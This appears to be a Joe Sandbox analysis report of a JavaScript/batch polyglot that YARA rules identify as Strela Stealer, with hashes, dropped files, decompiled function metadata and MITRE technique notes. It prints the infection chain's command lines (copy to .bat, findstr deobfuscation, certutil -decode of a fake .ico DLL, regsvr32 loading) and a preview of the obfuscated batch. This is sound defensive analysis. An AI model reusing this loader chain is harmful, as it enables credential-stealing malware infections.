Yara Hits:	Rule: JoeSecurity_EXEembeddedinBATfile, Description: Yara detected EXE embedded in BAT file, Source: C:\Users\user\mindtrembleopen.bat, Author: Joe Security
Preview:	/* flyutopianobedient..set flyutopianobedientadditionamusednation=q..set flyutopianobedientbeliefstageleft=m..set flyutopianobedientchubbyabackcrash=c..set flyutopianobedientgruesomegrandfatherpossible=j..set flyutopianobedientrainbasketexist=x..set flyutopianobedientbroadstimulatingcredit=r..set flyutopianobedienteyessilverexpansion=n..set flyutopianobedientsuperblampadorable=i..set flyutopianobedientblinkbravefuel=b..set flyutopianobedientplayamuckcoast=a..set flyutopianobedientbabyupbeatresponsible=l..set flyutopianobedientgapingenchantedtorpid=o..set flyutopianobedientpipehandleplate=h..set flyutopianobedientangleafraidflippant=t..set flyutopianobedientlakewordunequal=k..set flyutopianobedientcontinuefunnypie=g..set flyutopianobedientnoisyseedmess up=p..set flyutopianobedientradiatereportfog=s..set flyutopianobedientsquealleancrook=y..set flyutopianobedientphysicalabackfact=u..set flyutopianobedientbusysizelearned=e..set flyutopianobedientseashoresurprisecamp=w..set flyutopianobedi

C:\Users\user\mindtrembleopen.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\muddledfreedesert.ico

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	217854
Entropy (8bit):	7.117967343876302
Encrypted:	false
SSDEEP:	3072:Eq+5FU/HC+Y7zpLD2vV127JED676p2uUJTsYz+TPp/8WfAsz1jUB:Eq+5FUKRpv2H27J7HuuTs8+rGWAM1UB
MD5:	E3BD27AFD67F0319066823D6F4A97C33
SHA1:	92C8D3919AE6E8B74B89532FD66913230EACEBB4
SHA-256:	0C601FD2F457576FFA7ADAB61732BA9E9FB969B8060C750A5F6123BD42D17D4C
SHA-512:	50677CBCD559A1AE165C18353C60FE76CFD517A03E88624AF72E02083FE3CC1E42C0871D574A67306B9C1ED663D61BBE4321AE3F2E8A5C72FAD05865F6C548F7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..."..f..........& ...)......................L......................................3....`... .........................................L....................................@..x...........................`...(...................X................................text...............................`..`.data...`...........................@....rdata..............................@..@/4..................................@....pdata..............................@..@.xdata..............................@..@.bss....`................................edata..L...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..x....@......................@..B/14.....P....P......................@..B/29..........`......................@..B/41..........p......................@..B/55.....

Static File Info

General

File type:	ASCII text, with very long lines (3027), with CRLF line terminators
Entropy (8bit):	5.7782767634703776
TrID:	Java Script (8502/1) 100.00%
File name:	1239840531439025921.js
File size:	318'926 bytes
MD5:	f06bb1a7df51df32d783b34f92d9b66a
SHA1:	b687119329ce2407964f5230baf368d76073a8e1
SHA256:	84e1edd28a73544499787540829363608648e12c3f3f2955ab2fb3b1af1d1e05
SHA512:	a43a1c6b1ef84e1a833dc065d787d8482dfb8539a504752de71386aadf788e936943e1a4d37ad24c8ef1a57791aaf99e252928c1bb7c32cc41836af419286003
SSDEEP:	6144:eBHEsQEhu1bTtA/ZilnqbLJGpjEmWjuFnrPU+r:e99dSbTIiY/JGGuPt
TLSH:	7464AEB7146BFEC97B660F8C91C5BA024E5C7DB72229D30CAD8D2A9E23F94518C14DE4
File Content Preview:	/* flyutopianobedient..set flyutopianobedientadditionamusednation=q..set flyutopianobedientbeliefstageleft=m..set flyutopianobedientchubbyabackcrash=c..set flyutopianobedientgruesomegrandfatherpossible=j..set flyutopianobedientrainbasketexist=x..set flyut

File Icon


Icon Hash:	68d69b8bb6aa9a86

Target ID:	0
Start time:	14:25:22
Start date:	28/03/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1239840531439025921.js"
Imagebase:	0x7ff67d5b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:25:23
Start date:	28/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\1239840531439025921.js" "C:\Users\user\\mindtrembleopen.bat" && "C:\Users\user\\mindtrembleopen.bat"
Imagebase:	0x7ff6312d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:25:23
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:25:23
Start date:	28/03/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_operatingsystem get oslanguage
Imagebase:	0x7ff782fb0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:25:23
Start date:	28/03/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /i "1033"
Imagebase:	0x7ff6022c0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:25:23
Start date:	28/03/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /V flyutopianobedient ""C:\Users\user\\mindtrembleopen.bat""
Imagebase:	0x7ff795c50000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:25:23
Start date:	28/03/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode astonishinglewdselective muddledfreedesert.ico
Imagebase:	0x7ff6e04c0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:25:24
Start date:	28/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell regsvr32 muddledfreedesert.ico
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:25:25
Start date:	28/03/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\regsvr32.exe" muddledfreedesert.ico
Imagebase:	0x7ff60bfa0000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	15.9%
Signature Coverage:	3.7%
Total number of Nodes:	82
Total number of Limit Nodes:	2

Executed Functions

Function 02486908 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,?,?,?,?,?,02486904), ref: 02486933

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 6f2daaeeca48df6809e1ef62a5907e3c123bc7a7416cb568dceb1a8a4d26e80d
Instruction ID: 6ed55bd4aafc14af196648c06beffe062bc845c0ffc9d759a629a2cb8f8667ac
Opcode Fuzzy Hash: 6f2daaeeca48df6809e1ef62a5907e3c123bc7a7416cb568dceb1a8a4d26e80d
Instruction Fuzzy Hash: 31D05E203103084FEB5C7BB55A8822E265ACB45205F01183D5513CB7D6DD38D8048702

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFE102314B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00007FFE102314C7
LoadLibraryA.KERNEL32 ref: 00007FFE102314D8
GetProcAddress.KERNEL32 ref: 00007FFE102314F6
GetProcAddress.KERNEL32 ref: 00007FFE10231505

Strings

__deregister_frame_info, xrefs: 00007FFE102314F8
libgcc_s_dw2-1.dll, xrefs: 00007FFE102314BD
__register_frame_info, xrefs: 00007FFE102314E5

Memory Dump Source

Source File: 00000008.00000002.1707215142.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1707204334.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707226981.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707238787.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707267302.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707280816.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707293452.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: eac4c94454c1683f2d1643de50e5298fc4e81923689dd3558cc9618993412369
Instruction ID: 6244525d03add14c1aff11abf6b0fedf68933ef7e5f44f2a8bf370e0af9f5ecc
Opcode Fuzzy Hash: eac4c94454c1683f2d1643de50e5298fc4e81923689dd3558cc9618993412369
Instruction Fuzzy Hash: C2010961E09E1B98EA159B07B8101B52B64BFC87B4BA801B1CE1D573B6FF2CE50AC304

Uniqueness

Uniqueness Score: -1.00%

Function 0248EE88 Relevance: 1.8, APIs: 1, Instructions: 321COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 0248F0D7

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID: _clrfp
String ID:
API String ID: 3618594692-0
Opcode ID: bf11b2a348dd1cebbe3407e039c1e158691c8c076b119f432e33d7f46d24fa38
Instruction ID: f2704cf1350ffb45bf7fa550384e73bf9778bc3d456753cbf1f3dbdcaf0bc0a4
Opcode Fuzzy Hash: bf11b2a348dd1cebbe3407e039c1e158691c8c076b119f432e33d7f46d24fa38
Instruction Fuzzy Hash: 83B19E30620A4D8FDB59DF1CC88AB6A77E0FF59308F59859AE859CB261C335D896CF01

Uniqueness

Uniqueness Score: -1.00%

Function 02481240 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a872e6d0ce145e63e4b493c0a28ebaad772e9be0e78487281bcf853c86d47e
Instruction ID: a5808454595c65987f8abc2832c53ca97bb3395eed17122516463f5bdfac8bb1
Opcode Fuzzy Hash: c5a872e6d0ce145e63e4b493c0a28ebaad772e9be0e78487281bcf853c86d47e
Instruction Fuzzy Hash: 8FE15E70528B488FDB25EF18D895AEEB7E1FB94304F00062FE48ED3620DB749645CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02481740 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15cc186248de5ca8b7905a83fea9e7948ffbd5913fd68f4cba90bb8ca2c85fa2
Instruction ID: 0436821638d0004f97d77a9fc442cbad7c87500955633a604ddc3439aaecd829
Opcode Fuzzy Hash: 15cc186248de5ca8b7905a83fea9e7948ffbd5913fd68f4cba90bb8ca2c85fa2
Instruction Fuzzy Hash: 89B14D31218A498FDB29AF28DC986FE73E1FB94305F55422ED45FC3690DF349A068B81

Uniqueness

Uniqueness Score: -1.00%

Function 02486C5C Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7755fe846fb63fdab89a2c0b004d9a83724ebd39b55f4d955bef4c225e210f78
Instruction ID: dd33894508cd5af7213f0279958d9d10449acb20ae939c56b69981b9658c704d
Opcode Fuzzy Hash: 7755fe846fb63fdab89a2c0b004d9a83724ebd39b55f4d955bef4c225e210f78
Instruction Fuzzy Hash: 92512532328E0C4F8B5CEF6CD89867A73D2F7AC310315822FE40AC7265DA74D8468785

Uniqueness

Uniqueness Score: -1.00%

Function 02483A50 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02483AAC

Part of subcall function 024849F4: __GetUnwindTryBlock.LIBCMT ref: 02484A37
Part of subcall function 024849F4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02484A5C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02483B84
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02483DD3
std::bad_alloc::bad_alloc.LIBCMT ref: 02483EDF

Strings

csm, xrefs: 02483BA7
csm, xrefs: 02483AC6
csm, xrefs: 02483B2D

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 8e496da07347f5ca4c0083d8cca6809d31876793616045b4dee25a5dda52bfd8
Instruction ID: 91f7fc2a6a3bcaa9a456e11a9291a041d9386cad41a98af26746a162abceb734
Opcode Fuzzy Hash: 8e496da07347f5ca4c0083d8cca6809d31876793616045b4dee25a5dda52bfd8
Instruction Fuzzy Hash: 09E16F31528B488FDB25FF68C4856AEBBE1FB58714F50069EE849C7351DB34E881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1023A8A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FFE1023ABD7), ref: 00007FFE1023A8F3

Strings

Mingw-w64 runtime failure:, xrefs: 00007FFE1023A8DB
VirtualProtect failed with code 0x%x, xrefs: 00007FFE1023ABC8
Address %p has no image-section, xrefs: 00007FFE1023A9D7
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FFE1023AAD4

Memory Dump Source

Source File: 00000008.00000002.1707215142.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1707204334.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707226981.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707238787.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707267302.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707280816.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707293452.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: __acrt_iob_func
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 711238415-1534286854
Opcode ID: 7459aefd1802b1c5b4a3facf7298682d75401bea95dcfde2e06b05e2c2245f94
Instruction ID: afbeb1b4d873615d75137d57ec49fee0b7a7d5f609efb2d10ffec368df62f905
Opcode Fuzzy Hash: 7459aefd1802b1c5b4a3facf7298682d75401bea95dcfde2e06b05e2c2245f94
Instruction Fuzzy Hash: 45713FA2F04B498EEB54CB56D8816A937A1EB98BD8F544075DF0D8776AEF3CE641C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1023B9B0 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023B9E1
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023B9E6
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023B9F3
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFE1023BA02
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1023BA20

Memory Dump Source

Source File: 00000008.00000002.1707215142.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1707204334.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707226981.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707238787.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707267302.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707280816.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707293452.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_set_new_mode
String ID:
API String ID: 556796188-0
Opcode ID: d713d1ab00fc09b2163b8151d51110b22cf4d64260805eb9c7e1ae8cb6c399b9
Instruction ID: cd2f132ae90d2f278a7ee95ccc3f1f5f86f07c1f244c7205cc7e03da58280f9b
Opcode Fuzzy Hash: d713d1ab00fc09b2163b8151d51110b22cf4d64260805eb9c7e1ae8cb6c399b9
Instruction Fuzzy Hash: E8012976A04F098EE7159F2AD4813AC37A0FB88B98F409576E70D4B7A6CE38E490C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1023BA30 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_configure_wide_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BA61
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BA66
__p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BA73
__p__wenviron.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFE1023BA82
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1023BAA0

Memory Dump Source

Source File: 00000008.00000002.1707215142.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1707204334.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707226981.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707238787.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707250298.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707267302.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707280816.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707293452.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1707305551.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: __p___argc__p___wargv__p__wenviron_configure_wide_argv_set_new_mode
String ID:
API String ID: 3305919566-0
Opcode ID: c3cd763eb9e9f8b7c9556cb38ece850fa7336141f25a0961490245c00d1de611
Instruction ID: 0ad979a569376b1b678598a9b1c3d03795248cdfab3ba02e88759895004f5656
Opcode Fuzzy Hash: c3cd763eb9e9f8b7c9556cb38ece850fa7336141f25a0961490245c00d1de611
Instruction Fuzzy Hash: 8201E976A04F098EE7159F26D4853AC3BA4EB88B98F449572E74D4B7A6CE38D490C740

Uniqueness

Uniqueness Score: -1.00%

Function 024842D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 024842F8
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 024843E0

Strings

csm, xrefs: 02484432
csm, xrefs: 0248431A

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 0aa7a5c376eeb5ae11e699671e149143c489387923b3f49e9a28d806dabbf491
Instruction ID: 770038f9631b93b2a74a83fce7c1b6a244297f8edc4cb043e06e3df120280251
Opcode Fuzzy Hash: 0aa7a5c376eeb5ae11e699671e149143c489387923b3f49e9a28d806dabbf491
Instruction Fuzzy Hash: 85618E30628B4A8FCB68EF29908472EB7D1FB98715F54466FD499C7791CB70D881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02482690 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 024826BB
_IsNonwritableInCurrentImage.LIBCMT ref: 02482752

Strings

csm, xrefs: 02482739

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: e32cc06ee6daa03ae3f3bc1a8189994b09bd6cfa9f32bc22b13863d2a7eee494
Instruction ID: 542e47b252b0d6528cdc20670797b8225c6b7e5a8f47e30cf65a4edc1c8f996c
Opcode Fuzzy Hash: e32cc06ee6daa03ae3f3bc1a8189994b09bd6cfa9f32bc22b13863d2a7eee494
Instruction Fuzzy Hash: 72619330628E498BDF28FE5DD885A7D73D1FB54354B10426FEC86C3256EBB0E852CA85

Uniqueness

Uniqueness Score: -1.00%

Function 02483F20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02483FCB

Strings

RCC, xrefs: 02483F9B
MOC, xrefs: 02483F93

Memory Dump Source

Source File: 00000008.00000002.1707173156.0000000002481000.00000040.00001000.00020000.00000000.sdmp, Offset: 02481000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2481000_regsvr32.jbxd

Yara matches

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 07c68a8826f396dc2633518cec89643c6e24fd7e0188cafc8116b23aa0883d7f
Instruction ID: c9600fd5f3504e3687a56c840c4881fc9c923c53028caf114a5678340ada3ae5
Opcode Fuzzy Hash: 07c68a8826f396dc2633518cec89643c6e24fd7e0188cafc8116b23aa0883d7f
Instruction Fuzzy Hash: E571C430528B488FD769EF28C446BAAB7E0FB99704F044A5ED889C3251DB74E581CB83

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

